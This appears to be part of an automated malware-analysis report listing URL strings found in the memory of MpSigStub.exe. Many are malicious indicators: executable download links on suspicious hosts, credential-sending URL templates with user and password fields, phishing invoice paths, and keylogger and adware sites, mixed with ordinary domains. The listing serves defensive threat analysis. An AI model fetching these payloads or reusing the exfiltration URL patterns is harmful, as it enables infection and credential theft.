Source: MpSigStub.exe, 00000023.00000003.6273836006.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://www.3322.org/dyndns/getip
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://www.37db.cn/images/dis.htmwidth=0height=0
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: http://www.3800cc.com/
Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp	String found in binary or memory: http://www.455465x.com/test/IP.asp
Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://www.4dots-software.com/installmonetizer/emptyfoldercleaner.php/silentget
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://www.4shared.com/download/-u-Zcvyfce/SkyLinev5.exe
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://www.4shared.com/download/TZDZz2RBba/aTubeWD9.exe
Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp	String found in binary or memory: http://www.4threquest.me/
Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp	String found in binary or memory: http://www.4threquest.me/310714d/291014_nj.exe?
Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp	String found in binary or memory: http://www.4threquest.me/310714d/310714_br.exe?
Source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp	String found in binary or memory: http://www.51jetso.com
Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp	String found in binary or memory: http://www.51jetso.com/
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: http://www.520hack.com/
Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: http://www.52CPS.COM/goto/mm.Htm
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: http://www.52xdy.com
Source: MpSigStub.exe, 00000023.00000003.6274482455.0000028BD75C0000.00000004.00000001.sdmp	String found in binary or memory: http://www.58816.com
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://www.58hex.com/databack.php
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://www.5qbb.com
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: http://www.5z8.info/--initiate-credit-card-xfer--_g5l2og_autoinstall
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: http://www.6781.com/city/
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: http://www.6781.com/navhtm/nav
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: http://www.6781.com/tools/#
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: http://www.77169.net/
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	String found in binary or memory: http://www.7sponsor.com/
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	String found in binary or memory: http://www.887766.com/hi.htm
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://www.88vcd.com/htm/china/myb/send.asp?daqu=%s&xiaoqu=%s&user=%s&pass=%s&ckpass=%s&renwu=%s&lev
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: http://www.96333.com/
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://www.9aaa.com
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: http://www.CollakeSoftware.com
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: http://www.CollakeSoftware.comg
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	String found in binary or memory: http://www.DanlodBazar.blogfa.com
Source: MpSigStub.exe, 00000023.00000003.6303687995.0000028BD6EE5000.00000004.00000001.sdmp	String found in binary or memory: http://www.IM-Names.com/names
Source: MpSigStub.exe, 00000023.00000003.6303687995.0000028BD6EE5000.00000004.00000001.sdmp	String found in binary or memory: http://www.IM-Names.com/namesa
Source: MpSigStub.exe, 00000023.00000003.6279726781.0000028BD6C0C000.00000004.00000001.sdmp	String found in binary or memory: http://www.KJDhendieldiouyu.COM/CFDATA.ima?ccode=%s&cfdatacc=%s&gmt=%d
Source: MpSigStub.exe, 00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmp	String found in binary or memory: http://www.LuckyAcePoker.com/install
Source: MpSigStub.exe, 00000023.00000003.6285608853.0000028BD7FD8000.00000004.00000001.sdmp	String found in binary or memory: http://www.MalwareAlarm.com/
Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp	String found in binary or memory: http://www.PCKeeper.com
Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp	String found in binary or memory: http://www.PlanetCpp.com
Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp	String found in binary or memory: http://www.PriceFountain.net/go/postinstall/?action=install&partner=
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://www.Social2Search.com/privacy
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://www.acabogacia.org/doc0
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://www.acabogacia.org0
Source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp	String found in binary or memory: http://www.activision.com/games/wolfenstein/purchase.html
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://www.adserver.com
Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmp	String found in binary or memory: http://www.advgoogle.blogdpot.com
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	String found in binary or memory: http://www.agendagyn.com/media/fotos/2010/
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://www.airmak.it/information.rar
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://www.ajanster.com/zuppe/
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: http://www.al-enayah.com/ssfm
Source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmp	String found in binary or memory: http://www.alanga.net/
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://www.aldimarche.eu/
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://www.alexa.com
Source: MpSigStub.exe, 00000023.00000003.6319962733.0000028BD6878000.00000004.00000001.sdmp	String found in binary or memory: http://www.alfa-search.com/home.html
Source: MpSigStub.exe, 00000023.00000003.6319962733.0000028BD6878000.00000004.00000001.sdmp	String found in binary or memory: http://www.alfa-search.com/search.html
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://www.alibaba.com
Source: MpSigStub.exe, 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmp	String found in binary or memory: http://www.allatori.com
Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp	String found in binary or memory: http://www.alot.com/
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://www.alphadecimal.com/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://www.altayusa.com/ssl/js/prototype.js
Source: MpSigStub.exe, 00000023.00000003.6306362414.0000028BD740C000.00000004.00000001.sdmp	String found in binary or memory: http://www.alxup.com/bin/Up.ini
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://www.amazon.com
Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp	String found in binary or memory: http://www.amentosx.com/script/r.php
Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp	String found in binary or memory: http://www.ancert.com/cps0
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://www.andrewkarpie.com/sweat/secure/serve.php?protect=noefort)
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
Source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp	String found in binary or memory: http://www.antivirusxp2008.com
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/license-
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://www.appkyc6666.cn
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://www.apple.com
Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp	String found in binary or memory: http://www.applicablebeam.com/ddawdew/trjgje.exe
Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.ardamax.com
Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.ardamax.com/keylogger/
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	String found in binary or memory: http://www.arfa.it/rechnung/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://www.asame.org/includes/js/dtree/img/474/mamb/pdf/pdf.htm)
Source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp	String found in binary or memory: http://www.asianraw.com/members/vs.html
Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: http://www.ateliedeervas.com.br/scan/
Source: MpSigStub.exe, 00000023.00000003.6265277219.0000028BD7767000.00000004.00000001.sdmp	String found in binary or memory: http://www.avpro-labs.com/buy.html
Source: MpSigStub.exe, 00000023.00000003.6265277219.0000028BD7767000.00000004.00000001.sdmp	String found in binary or memory: http://www.avpro-labs.com/buy.htmlx
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: http://www.badu.cc
Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.cn/baidu?
Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.cn/s?
Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.com/baidu?
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.com/baidu?tn=
Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.com/cpro.php?
Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.com/s?
Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.com/s?wd=
Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.com/s?wd=http://www.google.cn/search?hl=zh-CN&q=http://search.cn.yahoo.com/search?p
Source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmp	String found in binary or memory: http://www.bin32.com/check?id=1&ver=16
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: http://www.bitly.com/yeuiqwbdhasdvbhsagdhj%public%
Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.blazehits.net/popup.
Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp	String found in binary or memory: http://www.blazingtools.com
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: http://www.bliao.com/
Source: MpSigStub.exe, 00000023.00000003.6341852976.0000028BD6C90000.00000004.00000001.sdmp	String found in binary or memory: http://www.blizzard.com/support/
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://www.blue-series.de
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://www.bluelook.es/bvvtbbh.php
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	String found in binary or memory: http://www.bobozim.hpg.com.br/nohot.jpg
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: http://www.bokee.com/
Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp	String found in binary or memory: http://www.bonusesfound.ml/install/inst64.exe
Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmp	String found in binary or memory: http://www.bonusesfound.ml/update/index.php
Source: MpSigStub.exe, 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmp	String found in binary or memory: http://www.bookiq.bsnl.co.in/data_entry/circulars/m
Source: MpSigStub.exe, 00000023.00000003.6324858901.0000028BD71BA000.00000004.00000001.sdmp	String found in binary or memory: http://www.boot-land.net/
Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmp	String found in binary or memory: http://www.boukan.8m.net/AYO_Soft/Index.html
Source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp	String found in binary or memory: http://www.britishtotty.com/content/homepage.html
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: http://www.browserwise.com/d
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://www.busnuansa.my.id/pboojfzdzpub/8888888.png
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://www.cakedan.com/
Source: MpSigStub.exe, 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp	String found in binary or memory: http://www.calyeung.com/exec/wmapop.perl
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.cashon.co.kr/app/app.php?url=
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.cashon.co.kr/app/install.php?
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.cashon.co.kr/app/uninstall.php?
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.cashon.co.kr/search/search.php
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.cashon.co.kr/search/search.phpx
Source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp	String found in binary or memory: http://www.ccleaner.com
Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmp	String found in binary or memory: http://www.ccnnic.com/download/
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: http://www.cepdep.org/csslb/graphics/outlines/registro-cita.php
Source: MpSigStub.exe, 00000023.00000003.6282670643.0000028BD7070000.00000004.00000001.sdmp	String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmp	String found in binary or memory: http://www.certum.pl/CPS0
Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.chambersign.org1
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://www.charlesboyer.it/invoice-for
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: http://www.chatzum.com/statistics/?affid=$RPT_AFFID&cztbid=$RPT_UID&inst=$RTP_SETINST&sethp=$RTP_SET
Source: MpSigStub.exe, 00000023.00000003.6341852976.0000028BD6C90000.00000004.00000001.sdmp	String found in binary or memory: http://www.cheathappens.com/trainer_troubleshooting_lite.asp
Source: MpSigStub.exe, 00000023.00000003.6341852976.0000028BD6C90000.00000004.00000001.sdmp	String found in binary or memory: http://www.cheathappens.com/unauthorized/
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://www.chipsroofingloveland.com/status/services-06-26-18-new-customer-vh/
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: http://www.chmeditor.com/
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://www.cinderella-movie.com/regist1.php?s=2&d=14&f=01
Source: MpSigStub.exe, 00000023.00000003.6307889726.0000028BD7137000.00000004.00000001.sdmp	String found in binary or memory: http://www.ckplayer.comutf-8
Source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmp	String found in binary or memory: http://www.cleveradds.com/
Source: MpSigStub.exe, 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmp	String found in binary or memory: http://www.clubnoega.com/_notes/arquivo1.exe
Source: MpSigStub.exe, 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmp	String found in binary or memory: http://www.clubnoega.com/_notes/arquivo2.exe
Source: MpSigStub.exe, 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmp	String found in binary or memory: http://www.clubnoega.com/_notes/arquivo3.exe
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: http://www.cmbchina.com/
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: http://www.cmfu.com/
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://www.cnn.com
Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://www.coapr13south.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://www.coapr13south.com/download.php?xe
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: http://www.codylindley.com)
Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://www.cojulyfastdl.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://www.cojulyfastdl.com/download.php?x
Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://www.cojune13coast.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://www.colegioarbitrosargentinos.com.ar/img/overdue-account/invoice-053541/
Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://www.comar13west.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://www.comay13north.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://www.comay15coat.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmp	String found in binary or memory: http://www.comegoto.com/host.jpg
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://www.comeinbaby.com/app/app.php?sn=%s&pn=%s&mn=%s&pv=%s&appid=%s&os=macservice&pt=%s&msn=%
Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp	String found in binary or memory: http://www.comfm.com
Source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp	String found in binary or memory: http://www.comfm.comx;
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://www.commonname.com/find.asp?cn=
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: http://www.constructed.fi/
Source: MpSigStub.exe, 00000023.00000003.6322023418.0000028BD7EF7000.00000004.00000001.sdmp	String found in binary or memory: http://www.consumerinput.com/
Source: MpSigStub.exe, 00000023.00000003.6322023418.0000028BD7EF7000.00000004.00000001.sdmp	String found in binary or memory: http://www.consumerinput.com/xb
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://www.contacto1190.com.mx/css/aa/index.php?userid=admin.sharepoint
Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://www.cooct13hen.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://www.cooctdlfast.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://www.cooctdlfast.com/download.php?x
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://www.copy9.com
Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://www.cosept13jetty.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://www.cosept14water.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp	String found in binary or memory: http://www.ctuser.net
Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp	String found in binary or memory: http://www.cultravel.it/invoice-number-
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	String found in binary or memory: http://www.cxgr.com/codec/play/download/playmp3/
Source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmp	String found in binary or memory: http://www.dandownload.com/
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: http://www.dangdang.com/
Source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp	String found in binary or memory: http://www.darxk.com/aviatic/systema.exe
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	String found in binary or memory: http://www.davion.plus.com/iscyqz.html
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.daybt.com/query.asp?q=%s
Source: MpSigStub.exe, 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmp	String found in binary or memory: http://www.dealply.com/faq/
Source: MpSigStub.exe, 00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmp	String found in binary or memory: http://www.default-search.net/search?sid=
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://www.defence.gov.au/pki0
Source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp	String found in binary or memory: http://www.delta-homes.com/
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://www.desh-datenservice.de/ups-view/
Source: MpSigStub.exe, 00000023.00000003.6279385939.0000028BD6BD6000.00000004.00000001.sdmp	String found in binary or memory: http://www.desktopsmiley.com/toolbar/desktopsmiley/download/
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: http://www.dhl.com/img/meta/dhl_logo.gif
Source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp	String found in binary or memory: http://www.dialerclub.com
Source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp	String found in binary or memory: http://www.diannaowang.com:8080
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: http://www.dianping.com/
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	String found in binary or memory: http://www.diaochapai.com/survey/
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://www.digitrends.co.ke/invoice/
Source: MpSigStub.exe, 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp	String found in binary or memory: http://www.direct-ip.com/
Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp	String found in binary or memory: http://www.distance24.org/route.json?stops=
Source: MpSigStub.exe, 00000023.00000003.6322023418.0000028BD7EF7000.00000004.00000001.sdmp	String found in binary or memory: http://www.djapp.info/?domain=xa
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: http://www.dk-soft.org
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	String found in binary or memory: http://www.dnangels.net/q2q/qqlong.asp
Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmp	String found in binary or memory: http://www.dnie.es/dpc0
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: http://www.dosearches.com/?utm_source=b&utm_medium=
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: http://www.doswf.com
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://www.down988.cn/2.htm?021width=0height=0
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: http://www.dsdsd.com/
